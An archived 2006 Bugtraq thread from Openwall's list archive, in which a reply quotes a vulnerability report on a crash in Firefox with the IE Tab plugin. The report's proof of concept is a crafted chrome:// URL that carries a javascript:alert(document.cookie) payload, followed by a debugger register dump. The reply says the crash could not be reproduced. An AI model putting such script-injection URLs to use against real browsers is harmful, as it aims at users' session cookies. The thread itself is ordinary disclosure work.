lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 19 May 2006 09:13:27 +0200
From: "Roman Daszczyszak" <romandas@...il.com>
To: bugtraq@...urityfocus.com
Cc: debasis@...kingspirits.com
Subject: Re: Firefox (with IETab Plugin) Null Pointer Dereferences Bug


Using Firefox 1.5.0.3 and IE Tab 1.0.9 on a Windows XP Pro SP2 +
latest patches, I was unable to reproduce this using your PoC
provided.

I created a new tab, pasted the URL you provided into it, hit enter
and received an 'Action Cancelled' page from IE.  Neither Firefox nor
IE crashed.

Was there something more to the bug that I am not seeing?

Regards,
Roman

> ---------- Forwarded message ----------
> From: "Debasis Mohanty" <debasis@...kingspirits.com>
> To: <bugtraq@...urityfocus.com>
> Date: Wed, 17 May 2006 23:48:23 +0530
> Subject: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Vendor: Mozilla
> Product: FireFox with IE Tab
>
> Tested On:
> FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
>
> Introduction:
> IETab (https://addons.mozilla.org/firefox/1419/) is a recently released
> (April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific
> sites under Firefox. Guess what ?? You can run windowsupdate under FireFox
> ;-)
>
> Bug Details:
> Firefox with the IETab installed crashes when ietab plugin is unable to
> handle specific javascripts. It seems to be a null pointer dereference bug.
> For more details refer the PoC section.
>
> Proof-of-Concept:
> Copy & paste the following URL to the Firefox addressbar and press enter -
>
> chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);
>
> Note: This test will not work if IETab is not installed.
>
> The Registers details after the crash:
>
> (1e4.3e0): Access violation - code c0000005 (first chance) First chance
> exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00010246
>
> npietab!NP_GetEntryPoints+0xb8ac:
>
> 0192e7dc 668b10           mov     dx,[eax]
> ds:0023:00000000=????
> 0:000> g
> (1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00000246
> npietab!NP_GetEntryPoints+0xb8ac:
> 0192e7dc 668b10           mov     dx,[eax]
> ds:0023:00000000=????
>
>
>
> For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html
>
>
> Credits:
> Debasis Mohanty (aka Tr0y)
> www.hackingspirits.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ